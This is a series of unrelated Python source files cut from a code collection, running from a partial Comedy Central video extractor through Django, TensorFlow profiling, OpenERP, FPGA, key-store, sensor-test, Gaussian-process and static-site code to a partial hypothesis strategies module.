'id': 'cef0cbb3-e776-4bc9-b62e-8016deccb354',
'ext': 'mp4',
'title': 'CC:Stand-Up|Greg Fitzsimmons: Life on Stage|Uncensored - Too Good of a Mother',
'description': 'After a certain point, breastfeeding becomes c**kblocking.',
},
}
class ComedyCentralShowsIE(MTVServicesInfoExtractor):
IE_DESC = 'The Daily Show / The Colbert Report'
# urls can be abbreviations like :thedailyshow
# urls for episodes like:
# or urls for clips like: http://www.thedailyshow.com/watch/mon-december-10-2012/any-given-gun-day
# or: http://www.colbertnation.com/the-colbert-report-videos/421667/november-29-2012/moon-shattering-news
# or: http://www.colbertnation.com/the-colbert-report-collections/422008/festival-of-lights/79524
_VALID_URL = r'''(?x)^(:(?P<shortname>tds|thedailyshow)
|https?://(:www\.)?
(?P<showname>thedailyshow|thecolbertreport)\.(?:cc\.)?com/
((?:full-)?episodes/(?:[0-9a-z]{6}/)?(?P<episode>.*)|
(?P<clip>
(?:(?:guests/[^/]+|videos|video-playlists|special-editions|news-team/[^/]+)/[^/]+/(?P<videotitle>[^/?#]+))
|(the-colbert-report-(videos|collections)/(?P<clipID>[0-9]+)/[^/]*/(?P<cntitle>.*?))
|(watch/(?P<date>[^/]*)/(?P<tdstitle>.*))
)|
(?P<interview>
extended-interviews/(?P<interID>[0-9a-z]+)/
(?:playlist_tds_extended_)?(?P<interview_title>[^/?#]*?)
(?:/[^/?#]?|[?#]|$))))
'''
_TESTS = [{
'url': 'http://thedailyshow.cc.com/watch/thu-december-13-2012/kristen-stewart',
'md5': '4e2f5cb088a83cd8cdb7756132f9739d',
'info_dict': {
'id': 'ab9ab3e7-5a98-4dbe-8b21-551dc0523d55',
'ext': 'mp4',
'upload_date': '20121213',
'description': 'Kristen Stewart learns to let loose in "On the Road."',
'uploader': 'thedailyshow',
'title': 'thedailyshow kristen-stewart part 1',
}
}, {
'url': 'http://thedailyshow.cc.com/extended-interviews/b6364d/sarah-chayes-extended-interview',
'info_dict': {
'id': 'sarah-chayes-extended-interview',
'description': 'Carnegie Endowment Senior Associate Sarah Chayes discusses how corrupt institutions function throughout the world in her book "Thieves of State: Why Corruption Threatens Global Security."',
'title': 'thedailyshow Sarah Chayes Extended Interview',
},
'playlist': [
{
'info_dict': {
'id': '0baad492-cbec-4ec1-9e50-ad91c291127f',
'ext': 'mp4',
'upload_date': '20150129',
'description': 'Carnegie Endowment Senior Associate Sarah Chayes discusses how corrupt institutions function throughout the world in her book "Thieves of State: Why Corruption Threatens Global Security."',
'uploader': 'thedailyshow',
'title': 'thedailyshow sarah-chayes-extended-interview part 1',
},
},
{
'info_dict': {
'id': '1e4fb91b-8ce7-4277-bd7c-98c9f1bbd283',
'ext': 'mp4',
'upload_date': '20150129',
'description': 'Carnegie Endowment Senior Associate Sarah Chayes discusses how corrupt institutions function throughout the world in her book "Thieves of State: Why Corruption Threatens Global Security."',
'uploader': 'thedailyshow',
'title': 'thedailyshow sarah-chayes-extended-interview part 2',
},
},
],
'params': {
'skip_download': True,
},
}, {
'url': 'http://thedailyshow.cc.com/extended-interviews/xm3fnq/andrew-napolitano-extended-interview',
'only_matching': True,
}, {
'url': 'http://thecolbertreport.cc.com/videos/29w6fx/-realhumanpraise-for-fox-news',
'only_matching': True,
}, {
'url': 'http://thecolbertreport.cc.com/videos/gh6urb/neil-degrasse-tyson-pt--1?xrs=eml_col_031114',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/guests/michael-lewis/3efna8/exclusive---michael-lewis-extended-interview-pt--3',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/episodes/sy7yv0/april-8--2014---denis-leary',
'only_matching': True,
}, {
'url': 'http://thecolbertreport.cc.com/episodes/8ase07/april-8--2014---jane-goodall',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/video-playlists/npde3s/the-daily-show-19088-highlights',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/video-playlists/t6d9sg/the-daily-show-20038-highlights/be3cwo',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/special-editions/2l8fdb/special-edition---a-look-back-at-food',
'only_matching': True,
}, {
'url': 'http://thedailyshow.cc.com/news-team/michael-che/7wnfel/we-need-to-talk-about-israel',
'only_matching': True,
}]
_available_formats = ['3500', '2200', '1700', '1200', '750', '400']
_video_extensions = {
'3500': 'mp4',
'2200': 'mp4',
'1700': 'mp4',
'1200': 'mp4',
'750': 'mp4',
'400': 'mp4',
}
_video_dimensions = {
'3500': (1280, 720),
'2200': (960, 540),
'1700': (768, 432),
'1200': (640, 360),
'750': (512, 288),
'400': (384, 216),
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
if mobj.group('shortname'):
if mobj.group('shortname') in ('tds', 'thedailyshow'):
url = 'http://thedailyshow.cc.com/full-episodes/'
else:
url = 'http://thecolbertreport.cc.com/full-episodes/'
mobj = re.match(self._VALID_URL, url, re.VERBOSE)
assert mobj is not None
if mobj.group('clip'):
if mobj.group('videotitle'):
epTitle = mobj.group('videotitle')
elif mobj.group('showname') == 'thedailyshow':
epTitle = mobj.group('tdstitle')
else:
epTitle = mobj.group('cntitle')
dlNewest = False
elif mobj.group('interview'):
epTitle = mobj.group('interview_title')
dlNewest = False
else:
dlNewest = not mobj.group('episode')
if dlNewest:
epTitle = mobj.group('showname')
else:
epTitle = mobj.group('episode')
show_name = mobj.group('showname')
webpage, htmlHandle = self._download_webpage_handle(url, epTitle)
if dlNewest:
url = htmlHandle.geturl()
mobj = re.match(self._VALID_URL, url, re.VERBOSE)
if mobj is None:
raise ExtractorError('Invalid redirected URL: ' + url)
if mobj.group('episode') == '':
raise ExtractorError('Redirected URL is still not specific: ' + url)
epTitle = (mobj.group('episode') or mobj.group('videotitle')).rpartition('/')[-1]
mMovieParams = re.findall('(?:<param name="movie" value="|var url = ")(http://media.mtvnservices.com/([^"]*(?:episode|video).*?:.*?))"', webpage)
if len(mMovieParams) == 0:
# The Colbert Report embeds the information in a without
# a URL prefix; so extract the alternate reference
# and then add the URL prefix manually.
altMovieParams = re.findall('data-mgid="([^"]*(?:episode|video|playlist).*?:.*?)"', webpage)
if len(altMovieParams) == 0:
raise ExtractorError('unable to find Flash URL in webpage ' + url)
else:
mMovieParams = [("http://media.mtvnservices.com/" + altMovieParams[0], altMovieParams[0])]
uri = mMovieParams[0][1]
# Correct cc.com in uri
uri = re.sub(r'(episode:[^.]+)(\.cc)?\.com', r'\1.com', uri)
index_url = 'http://%s.cc.com/feeds/mrss?%s' % (show_name, compat_urllib_parse.urlencode({'uri': uri}))
idoc = self._download_xml(
index_url, epTitle,
'Downloading show index', 'Unable to download episode index')
title = idoc.find('./channel/title').text
description = idoc.find('./channel/description').text
entries = []
item_els = idoc.findall('.//item')
for part_num, itemEl in enumerate(item_els):
upload_date = unified_strdate(itemEl.findall('./pubDate')[0].text)
thumbnail = itemEl.find('.//{http://search.yahoo.com/mrss/}thumbnail').attrib.get('url')
content = itemEl.find('.//{http://search.yahoo.com/mrss/}content')
duration = float_or_none(content.attrib.get('duration'))
mediagen_url = content.attrib['url']
guid = itemEl.find('./guid').text.rpartition(':')[-1]
cdoc = self._download_xml(
mediagen_url, epTitle,
'Downloading configuration for segment %d / %d' % (part_num + 1, len(item_els)))
turls = []
for rendition in cdoc.findall('.//rendition'):
finfo = (rendition.attrib['bitrate'], rendition.findall('./src')[0].text)
turls.append(finfo)
formats = []
for format, rtmp_video_url in turls:
w, h = self._video_dimensions.get(format, (None, None))
formats.append({
'format_id': 'vhttp-%s' % format,
'url': self._transform_rtmp_url(rtmp_video_url),
'ext': self._video_extensions.get(format, 'mp4'),
'height': h,
'width': w,
})
formats.append({
'format_id': 'rtmp-%s' % format,
'url': rtmp_video_url.replace('viacomccstrm', 'viacommtvstrm'),
'ext': self._video_extensions.get(format, 'mp4'),
'height': h,
'width': w,
})
self._sort_formats(formats)
subtitles = self._extract_subtitles(cdoc, guid)
virtual_id = show_name + ' ' + epTitle + ' part ' + compat_str(part_num + 1)
entries.append({
'id': guid,
'title': virtual_id,
'formats': formats,
'uploader': show_name,
'upload_date': upload_date,
'duration': duration,
'thumbnail': thumbnail,
'description': description,
'subtitles': subtitles,
})
return {
'_type': 'playlist',
'id': epTitle,
'entries': entries,
'title': show_name + ' ' + title,
'description': description,
}
|
"""
An alphabetical list of Swedish counties, sorted by codes.
http://en.wikipedia.org/wiki/Counties_of_Sweden
This exists in this standalone file so that it's only imported into memory
when explicitly needed.
"""
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
COUNTY_CHOICES = (
('AB', _('Stockholm')),
('AC', _('Västerbotten')),
('BD', _('Norrbotten')),
('C', _('Uppsala')),
('D', _('Södermanland')),
('E', _('Östergötland')),
('F', _('Jönköping')),
('G', _('Kronoberg')),
('H', _('Kalmar')),
('I', _('Gotland')),
('K', _('Blekinge')),
('M', _('Skåne')),
('N', _('Halland')),
('O', _('Västra Götaland')),
('S', _('Värmland')),
('T', _('Örebro')),
('U', _('Västmanland')),
('W', _('Dalarna')),
('X', _('Gävleborg')),
('Y', _('Västernorrland')),
('Z', _('Jämtland')),
)
|
import document_page_show_diff
|
"""Data structures and algorithms for profiling information."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
class ProfileDatum(object):
"""Profile data point."""
def __init__(self,
device_name,
node_exec_stats,
file_path,
line_number,
func_name,
op_type):
"""Constructor.
Args:
device_name: (string) name of the device.
node_exec_stats: `NodeExecStats` proto.
file_path: path to the source file involved in creating the op.
line_number: line number in the file involved in creating the op.
func_name: name of the function that the line belongs to.
op_type: (string) Operation type.
"""
self.device_name = device_name
self.node_exec_stats = node_exec_stats
self.file_path = file_path
self.line_number = line_number
self.func_name = func_name
if self.file_path:
self.file_line_func = "%s:%d(%s)" % (
os.path.basename(self.file_path), self.line_number, self.func_name)
else:
self.file_line_func = ""
self.op_type = op_type
self.start_time = self.node_exec_stats.all_start_micros
self.op_time = (self.node_exec_stats.op_end_rel_micros -
self.node_exec_stats.op_start_rel_micros)
@property
def exec_time(self):
"""Op execution time plus pre- and post-processing."""
return self.node_exec_stats.all_end_rel_micros
class AggregateProfile(object):
"""Profile summary data for aggregating a number of ProfileDatum."""
def __init__(self, profile_datum):
"""Constructor.
Args:
profile_datum: (`ProfileDatum`) an instance of `ProfileDatum` to
initialize this object with.
"""
self.total_op_time = profile_datum.op_time
self.total_exec_time = profile_datum.exec_time
device_and_node = "%s:%s" % (profile_datum.device_name,
profile_datum.node_exec_stats.node_name)
self._node_to_exec_count = {device_and_node: 1}
def add(self, profile_datum):
"""Accumulate a new instance of ProfileDatum.
Args:
profile_datum: (`ProfileDatum`) an instance of `ProfileDatum` to
accumulate to this object.
"""
self.total_op_time += profile_datum.op_time
self.total_exec_time += profile_datum.exec_time
device_and_node = "%s:%s" % (profile_datum.device_name,
profile_datum.node_exec_stats.node_name)
device_and_node = "%s:%s" % (profile_datum.device_name,
profile_datum.node_exec_stats.node_name)
if device_and_node in self._node_to_exec_count:
self._node_to_exec_count[device_and_node] += 1
else:
self._node_to_exec_count[device_and_node] = 1
@property
def node_count(self):
return len(self._node_to_exec_count)
@property
def node_exec_count(self):
return sum(self._node_to_exec_count.values())
|
from openerp.osv import fields,osv
from openerp import tools
AVAILABLE_PRIORITIES = [
('0', 'Low'),
('1', 'Normal'),
('2', 'High')
]
class crm_claim_report(osv.osv):
""" CRM Claim Report"""
_name = "crm.claim.report"
_auto = False
_description = "CRM Claim Report"
_columns = {
'user_id':fields.many2one('res.users', 'User', readonly=True),
'section_id':fields.many2one('crm.case.section', 'Section', readonly=True),
'nbr': fields.integer('# of Claims', readonly=True), # TDE FIXME master: rename into nbr_claims
'company_id': fields.many2one('res.company', 'Company', readonly=True),
'create_date': fields.datetime('Create Date', readonly=True, select=True),
'claim_date': fields.datetime('Claim Date', readonly=True),
'delay_close': fields.float('Delay to close', digits=(16,2),readonly=True, group_operator="avg",help="Number of Days to close the case"),
'stage_id': fields.many2one ('crm.case.stage', 'Stage', readonly=True,domain="[('section_ids','=',section_id)]"),
'categ_id': fields.many2one('crm.case.categ', 'Category',\
domain="[('section_id','=',section_id),\
('object_id.model', '=', 'crm.claim')]", readonly=True),
'partner_id': fields.many2one('res.partner', 'Partner', readonly=True),
'company_id': fields.many2one('res.company', 'Company', readonly=True),
'priority': fields.selection(AVAILABLE_PRIORITIES, 'Priority'),
'type_action': fields.selection([('correction','Corrective Action'),('prevention','Preventive Action')], 'Action Type'),
'date_closed': fields.datetime('Close Date', readonly=True, select=True),
'date_deadline': fields.date('Deadline', readonly=True, select=True),
'delay_expected': fields.float('Overpassed Deadline',digits=(16,2),readonly=True, group_operator="avg"),
'email': fields.integer('# Emails', size=128, readonly=True),
'subject': fields.char('Claim Subject', readonly=True)
}
def init(self, cr):
""" Display Number of cases And Section Name
@param cr: the current row, from the database cursor,
"""
tools.drop_view_if_exists(cr, 'crm_claim_report')
cr.execute("""
create or replace view crm_claim_report as (
select
min(c.id) as id,
c.date as claim_date,
c.date_closed as date_closed,
c.date_deadline as date_deadline,
c.user_id,
c.stage_id,
c.section_id,
c.partner_id,
c.company_id,
c.categ_id,
c.name as subject,
count(*) as nbr,
c.priority as priority,
c.type_action as type_action,
c.create_date as create_date,
avg(extract('epoch' from (c.date_closed-c.create_date)))/(3600*24) as delay_close,
(SELECT count(id) FROM mail_message WHERE model='crm.claim' AND res_id=c.id) AS email,
extract('epoch' from (c.date_deadline - c.date_closed))/(3600*24) as delay_expected
from
crm_claim c
group by c.date,\
c.user_id,c.section_id, c.stage_id,\
c.categ_id,c.partner_id,c.company_id,c.create_date,
c.priority,c.type_action,c.date_deadline,c.date_closed,c.id
)""")
|
import csv
import numpy as np
from utils import util
from utils.clock_utils import make_bufg, MAX_GLOBAL_CLOCKS
from prjuray.db import Database
CMT_XY_FUN = util.create_xy_fun('')
def print_top(seed):
np.random.seed(seed)
db = Database(util.get_db_root(), util.get_part())
grid = db.grid()
site_to_tile = {}
site_to_site_type = {}
for tile_name in sorted(grid.tiles()):
loc = grid.loc_of_tilename(tile_name)
gridinfo = grid.gridinfo_at_loc(loc)
for site, site_type in gridinfo.sites.items():
site_to_site_type[site] = site_type
site_to_tile[site] = tile_name
bufce_row_drivers = {}
with open('../active_bufce_row.csv') as f:
for row in csv.DictReader(f):
tile = site_to_tile[row['site']]
gridinfo = grid.gridinfo_at_tilename(tile)
if gridinfo.tile_type == 'CMT_RIGHT':
continue
clock_region = CMT_XY_FUN(row['site_clock_region'])
key = clock_region, int(row['hdistr_number'])
assert key not in bufce_row_drivers
bufce_row_drivers[key] = row['site']
bufg_drivers = {}
with open('../bufg_outputs.csv') as f:
for row in csv.DictReader(f):
if row['hroute_output'] == 'all':
continue
clock_region = CMT_XY_FUN(row['clock_region'])
key = clock_region, int(row['hroute_output'])
assert key not in bufg_drivers
bufg_drivers[key] = row['site']
clock_regions = set()
for clock_region, _ in bufce_row_drivers.keys():
clock_regions.add(clock_region)
for clock_region, _ in bufg_drivers.keys():
clock_regions.add(clock_region)
print("""
module top();
""")
for hroute in range(MAX_GLOBAL_CLOCKS):
if np.random.randint(2):
continue
select_clock_regions = sorted(clock_regions)
np.random.shuffle(select_clock_regions)
bufg = None
while True:
clock_region = select_clock_regions.pop()
key = clock_region, hroute
if key in bufg_drivers:
bufg = bufg_drivers[key]
break
if bufg is None:
continue
sel_x, sel_y = clock_region
clock_regions_for_bufg = []
for x, y in clock_regions:
if y == sel_y:
clock_regions_for_bufg.append((x, y))
clock_regions_for_bufg.sort()
np.random.shuffle(clock_regions_for_bufg)
bufce_row = None
while True:
clock_region = clock_regions_for_bufg.pop()
key = clock_region, hroute
if key in bufce_row_drivers:
bufce_row = bufce_row_drivers[key]
break
if bufce_row is None:
continue
bufg_s, bufg_o_wire = make_bufg(
site=bufg,
site_type=site_to_site_type[bufg],
idx=hroute,
ce_inputs=['1'],
randlib=np.random)
print(bufg_s)
print("""
(* LOC="{loc}", KEEP, DONT_TOUCH *) BUFCE_ROW row{idx} (
.I({bufg_o_wire})
);""".format(
loc=bufce_row,
idx=hroute,
bufg_o_wire=bufg_o_wire,
))
print('endmodule')
with open('complete_top.tcl', 'w') as f:
print(
"""
write_checkpoint -force design_reset.dcp
close_design
open_checkpoint design_reset.dcp
route_design
""",
file=f)
|
"""
controlbeast.keystore.handler
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2013 by the ControlBeast team, see AUTHORS.
:license: ISC, see LICENSE for details.
"""
from collections import UserDict
import os
import tempfile
import yaml
from controlbeast.keystore.plain import CbKsPlain
from controlbeast.keystore.crypto import CbKsCrypto
from controlbeast.keystore.exception import CbKsPasswordError
class CbKeyStore(UserDict):
"""
Key store handler.
A key store is similar to a normal Python dictionary, except it offers persistence
by storing its content - optionally encrypted - within a file. Since YAML is used
for serialisation, a key store is limited to contents which can be represented in
YAML, such as strings, numbers, and other serializable objects.
If no ``file`` argument is passed, the key store resorts to using a temporary file
which will be deleted as soon as the key store object is destroyed.
If no ``password`` argument is passed, the key store will not encrypt its serialized
representation within the file.
.. warning::
The synchronisation behaviour of this key store class is mostly unidirectional, meaning
it will take into account the file backend's content only at the moment when the key store
object is created. If the backend file is changed by any other means (a second key store
object, an external text editor, ...), the key store will not take into account these
changes, but overwrite them with the next update on its own data.
Therefore, it is highly recommended to
* never create two key store objects operating on the same file
* use key store objects in an environment preponderantly using read-only access
* when using key store objects in :py:mod:`multiprocessing` or :py:mod:`threading` environments,
implement appropriate synchronisation mechanisms (although this will not protect from completely
external changes to the backend file)
:param str file: path to file already containing or intended to contain the key store
:param str passphrase: Passphrase to derive the key from, if key store should be encrypted
"""
#: flag signalizing whether this store is temporary or not
_tmp = False
#: flag signalizing whether this store is read-only or not
_read_only = False
def __init__(self, file='', passphrase='', dict=None, **kwargs):
"""
Key store constructor
"""
if file:
self._file = file
self._tmp = False
else:
fp, self._file = tempfile.mkstemp()
os.close(fp)
self._tmp = True
if passphrase:
self._backend = CbKsCrypto(file=self._file, passphrase=passphrase)
else:
self._backend = CbKsPlain(file=self._file)
self._read_only = self._backend.read_only
if self._backend.plaintext:
try:
data = yaml.safe_load(self._backend.plaintext)
except yaml.YAMLError:
self._read_only = True
data = {}
else:
data = {}
# Illegal read, e. g. due to a wrong / invalid password
if self._backend.return_code != os.EX_OK:
if 'bad decrypt' in self._backend.stderr:
raise CbKsPasswordError(filename=self._file)
if dict is not None and self._read_only is not True:
data.update(dict)
super(CbKeyStore, self).__init__(dict=data, **kwargs)
def __setitem__(self, key, item):
"""
Overrides default ``__setitem__`` method. Functionality is identical, except data are synced to the
backend after executing the data update.
"""
if not self._read_only:
super(CbKeyStore, self).__setitem__(key, item)
self._sync()
else:
raise TypeError("This key store is read-only.")
def __delitem__(self, key):
"""
Overrides default ``__delitem__`` method. Functionality is identical, except data are synced to the
backend after executing the data update.
"""
if not self._read_only:
super(CbKeyStore, self).__delitem__(key)
self._sync()
else:
raise TypeError("This key store is read-only.")
def __del__(self):
"""
Clean up when object gets de-referenced
"""
if self._tmp:
os.unlink(self._file)
def _sync(self):
"""
Synchronize current data into the backend. This method is called every time the data stored in
this key store are modified.
"""
if not self._read_only:
self._backend.plaintext = yaml.dump(self.data, default_flow_style=False)
else:
raise TypeError("This key store is read-only.")
@property
def read_only(self):
"""
Boolean indicating whether the key store is read-only or not
"""
return self._read_only
@read_only.setter
def read_only(self, value):
if value:
self._read_only = True
@property
def file(self):
"""
Path of the file used as backend
"""
return self._file
|
"""
@file test_magnet_mag3110.py
"""
import os
import time
from oeqa.utils.helper import shell_cmd
from oeqa.oetest import oeRuntimeTest
from EnvirSetup import EnvirSetup
from oeqa.utils.decorators import tag
@tag(TestType="FVT", FeatureID="IOTOS-757")
class TestMagnetMAG3110(oeRuntimeTest):
"""
@class TestMagnetMAG3110
"""
def setUp(self):
'''Generate test app on target
@fn setUp
@param self
@return'''
print 'start!\n'
#connect sensor and DUT through board
#shell_cmd("sudo python "+ os.path.dirname(__file__) + "/Connector.py mag3110")
envir = EnvirSetup(self.target)
envir.envirSetup("mag3110","magnet")
def tearDown(self):
'''unload mag3110 driver
@fn tearDown
@param self
@return'''
(status, output) = self.target.run("cat /sys/devices/virtual/dmi/id/board_name")
if "Minnow" in output:
(status, output) = self.target.run(
"cd /sys/bus/i2c/devices; \
echo 0x0e >i2c-1/delete_device")
if "Galileo" in output:
(status, output) = self.target.run(
"cd /sys/bus/i2c/devices; \
echo 0x0e >i2c-0/delete_device")
def test_Magnet_MAG3110(self):
'''Execute the test app and verify sensor data
@fn test_Magnet_MAG3110
@param self
@return'''
print 'start reading data!'
(status, output) = self.target.run(
"chmod 777 /opt/apps/test_magnet_mag3110.fbp")
(status, output) = self.target.run(
"cd /opt/apps; ./test_magnet_mag3110.fbp >re.log")
error = output
(status, output) = self.target.run(
"cp /opt/apps/re.log /home/root/mag3110.log")
#verification of target sensor data
(status, output) = self.target.run("cat /opt/apps/re.log|grep direction-vector")
print output + "\n"
self.assertEqual(status, 0, msg="Error messages: %s" % error)
#make sure sensor data is valid
(status, output) = self.target.run("cat /opt/apps/re.log|grep '0.000000, 0.000000, 0.000000'")
self.assertEqual(status, 1, msg="Error messages: %s" % output)
|
class Node:
def __init__(self, val=None):
self.left, self.right, self.val = None, None, val
INFINITY = float("infinity")
NEG_INFINITY = float("-infinity")
def isBST(tree, minVal=NEG_INFINITY, maxVal=INFINITY):
if tree is None:
return True
if not minVal <= tree.val <= maxVal:
return False
return isBST(tree.left, minVal, tree.val) and \
isBST(tree.right, tree.val, maxVal)
def isBST2(tree, lastNode=[NEG_INFINITY]):
if tree is None:
return True
if not isBST2(tree.left, lastNode):
return False
if tree.val < lastNode[0]:
return False
lastNode[0]=tree.val
return isBST2(tree.right, lastNode)
|
from __future__ import division
import numpy as np
from numpy.linalg import solve
def cov_mat(x1, x2, a, b):
return a * np.exp(-b * (x1[:, np.newaxis] - x2)**2)
def reg_cov_mat(x, a, b, c):
return cov_mat(x, x, a, b) + c * np.eye(x.shape[0])
def compute_means_covs(ts, t_ref, gp_parms, winsize=0, mean_shift=True):
"""
Compute the posterior GP means and covariance matrices.
ts: time series
t_ref: reference time points the posterior GP is marginalized over
gp_parms: GP hyperparameters and the noise term
winsize: window size, 0 for using the full Gaussian (over t_ref)
"""
a, b, c = gp_parms
K_test = cov_mat(t_ref, t_ref, a, b)
n_ts = len(ts)
n_sample = len(t_ref)
if winsize == 0:
post_means = np.empty((n_ts, n_sample))
post_covs = np.empty((n_ts, n_sample, n_sample))
else:
n_kernel = n_sample - winsize + 1
post_means = np.empty((n_ts, n_kernel, winsize))
post_covs = np.empty((n_ts, n_kernel, winsize, winsize))
for idx, (t, y) in enumerate(ts):
mean_list, cov_list = [], []
K_train = reg_cov_mat(t, a, b, c)
K_train_test = cov_mat(t, t_ref, a, b)
Ktr_inv_Ktt = solve(K_train, K_train_test)
if mean_shift:
mu = np.mean(y)
mean_test = mu + Ktr_inv_Ktt.T.dot(y - mu)
else:
mean_test = Ktr_inv_Ktt.T.dot(y)
full_cov = K_test - K_train_test.T.dot(Ktr_inv_Ktt)
if winsize == 0:
post_means[idx] = mean_test
post_covs[idx] = full_cov
else:
for i in xrange(n_sample - winsize + 1):
post_means[idx, i] = mean_test[i:(i + winsize)]
post_covs[idx, i] = full_cov[i:(i + winsize), i:(i + winsize)]
return post_means, post_covs
|
import arrow
from jinja2 import Environment, FileSystemLoader, select_autoescape
import mistune
from yaml import load
import os
from pathlib import Path
import pygments
from pygments import highlight
from pygments.lexers import get_lexer_by_name
from pygments.formatters import html
import shutil
import re
from xml.dom import minidom
import xml.etree.ElementTree as ET
env = Environment(loader=FileSystemLoader("layouts"))
class CustomRenderer(mistune.Renderer):
def codespan(self, text):
return "<code class=\"highlight\">{}</code>".format(text)
def link(self, link, title, content):
if link.startswith("http://") or link.startswith("https://"):
return super().link(link, title, content)
else:
fname, _ = parse_post_filename(link)
return super().link(fname, title, content)
def block_code(self, code, lang):
if not lang:
return "\n<pre><code>{}</code></pre>\n".format(
mistune.escape(code)
)
lexer = get_lexer_by_name(lang, stripall=True)
formatter = html.HtmlFormatter()
return highlight(code, lexer, formatter)
def toc(self):
return self.render_toc()
def reset_toc(self):
self.toc_tree = []
self.toc_count = 0
def header(self, text, level, raw=None):
rv = '<h%d id="toc-%d">%s</h%d>\n' % (
level, self.toc_count, text, level
)
self.toc_tree.append((self.toc_count, text, level, raw))
self.toc_count += 1
return rv
def render_toc(self, level=3):
return "".join(self._iter_toc(level))
def _iter_toc(self, level):
first_level = 0
last_level = 0
yield "<ul id=\"table-of-content\">\n"
for toc in self.toc_tree:
index, text, l, raw = toc
if l > level:
continue
if first_level == 0 :
# based on first level
first_level = l
last_level = l
yield "<li><a href=\"#toc-{0}\">{1}</a>".format(
index, text)
elif last_level == l:
yield "</li>\n<li><a href=\"#toc-{0}\">{1}</a>".format(
index, text)
elif last_level == l - 1:
last_level = l
yield "<ul>\n<li><a href=\"#toc-{0}\">{1}</a>".format(
index, text)
elif last_level > l:
# close indention
yield "</li>"
while last_level > l:
yield "</ul>\n</li>\n"
last_level -= 1
yield "<li><a href=\"#toc-{0}\">{1}</a>".format(
index, text)
# close tags
yield "</li>\n"
while last_level > first_level:
yield "</ul>\n</li>\n"
last_level -= 1
yield "</ul>\n"
def rfc_link(self, rfc_number):
return (
"<a href=\"https://tools.ietf.org/html/rfc{0}\">RFC{0}</a>"
).format(rfc_number)
class CustomLexer(mistune.InlineLexer):
def enable_rfc_link(self):
self.rules.rfc_link = re.compile(r"\[\[RFC([0-9]*)\]\]")
self.default_rules.insert(3, "rfc_link")
def output_rfc_link(self, m):
rfc_number = m.group(1)
return self.renderer.rfc_link(rfc_number)
custom_renderer = CustomRenderer()
custom_lexer = CustomLexer(custom_renderer)
custom_lexer.enable_rfc_link()
ms_markdown = mistune.Markdown(renderer=custom_renderer, inline=custom_lexer)
def render_post_html(markdown, post_title, post_date):
template = env.get_template("post.html")
custom_renderer.reset_toc()
content = ms_markdown(markdown)
# Substitute the {:toc} place holder with our generated TOC.
toc = custom_renderer.render_toc(level=1)
content = re.sub(r"\{:toc\}", toc, content)
return template.render(
post_title=post_title,
post_content=content,
page_title=post_title,
post_date=post_date.format("DD MMMM YYYY")
)
def render_page_html(markdown, post_title):
template = env.get_template("page.html")
custom_renderer.reset_toc()
content = ms_markdown(markdown)
return template.render(
post_title=post_title,
post_content=content,
page_title=post_title,
)
def render_index_page(posts):
template = env.get_template("index.html")
return template.render(posts=posts, page_title="Home")
def parse_frontmatter(frontmatter):
return load(frontmatter)
def read_file(f):
first = f.readline()
if first == "---\n":
frontmatter = ""
while True:
line = f.readline()
if line == "---\n":
break
frontmatter += line
markdown = f.read()
return frontmatter, markdown
else:
return None, first + f.read()
def parse_post_filename(fname):
url = fname[11:]
date = fname[:10]
return url, arrow.get(date, "YYYY-MM-DD")
def build_site():
posts = []
# Make output directory
try:
shutil.rmtree("output")
except FileNotFoundError:
pass
os.makedirs("output", exist_ok=True)
shutil.copytree("public", "output/public")
shutil.copytree("assets", "output/assets")
shutil.copy("favi.ico", "output/favi.ico")
# Iterate and render all files in the pages/ directory.
p = Path("pages")
for i in p.glob("*.md"):
with i.open("r") as f:
frontmatter, markdown = read_file(f)
fname = i.stem
frontmatter = parse_frontmatter(frontmatter)
html = render_page_html(markdown, frontmatter["title"])
with open("output/{}.html".format(fname), "w") as f:
f.write(html)
# Iterate and render all files in the posts/ directory.
p = Path("posts")
for i in p.glob("*.md"):
with i.open("r") as f:
frontmatter, markdown = read_file(f)
fname, date = parse_post_filename(i.stem)
frontmatter = parse_frontmatter(frontmatter)
html = render_post_html(markdown, frontmatter["title"], date)
with open("output/{}.html".format(fname), "w") as f:
f.write(html)
posts.append({
"title": frontmatter["title"],
"url": fname,
"date": date
})
posts.sort(key=lambda i: i["date"], reverse=True)
for i in posts:
i["date"] = i["date"].format("YYYY-MM-DD")
html = render_index_page(posts)
with open("output/index.html", "w") as f:
f.write(html)
rss = ET.Element("rss", version="2.0")
rss_channel = ET.SubElement(rss, "channel")
ET.SubElement(rss_channel, "title").text = "Ayrx's Blog"
ET.SubElement(rss_channel, "description").text = "Information Security"
ET.SubElement(rss_channel, "link").text = "https://www.ayrx.me"
for i in posts:
rss_item = ET.SubElement(rss_channel, "item")
ET.SubElement(rss_item, "title").text = i["title"]
ET.SubElement(
rss_item, "link").text = "https://www.ayrx.me/{}".format(i["url"])
doc = minidom.parseString(ET.tostring(rss))
doc.toprettyxml(encoding="utf-8")
with open("output/feed.xml", "wb") as f:
f.write(doc.toprettyxml(encoding="utf-8"))
|
from typing import Tuple
from hypothesis import strategies
from cetus.queries.filters import (PREDICATES,
LOGICAL_OPERATORS,
INCLUSION_OPERATORS,
RANGE_OPERATORS,
COMPARISON_OPERATORS)
from cetus.types import ColumnValueType
from .utils import date_times_strategy
from tests.strategies.utils import identifiers_strategy
predicates_names_strategy = strategies.one_of(strategies.just(predicate)
for predicate in PREDICATES)
values_strategy = strategies.one_of(date_times_strategy,
strategies.booleans(),
strategies.integers(),
strategies.floats(
allow_infinity=False,
allow_nan=False),
strategies.text())
values_lists_strategy = strategies.lists(values_strategy)
values_range_strategy = strategies.tuples(values_strategy,
values_strategy)
filter_strategy = strategies.tuples(identifiers_strategy,
strategies.one_of(
values_strategy,
values_lists_strategy,
values_range_strategy))
def predicates_has_correct_value(
predicate: Tuple[str, Tuple[str, ColumnValueType]]) -> bool:
predicate_name, filter_ = predicate
_, value = filter_
inclusion_operator_has_list_value = (
predicate_name not in INCLUSION_OPERATORS or
isinstance(value, list))
range_operator_has_tuple_value = (
predicate_name not in RANGE_OPERATORS or
isinstance(value, tuple))
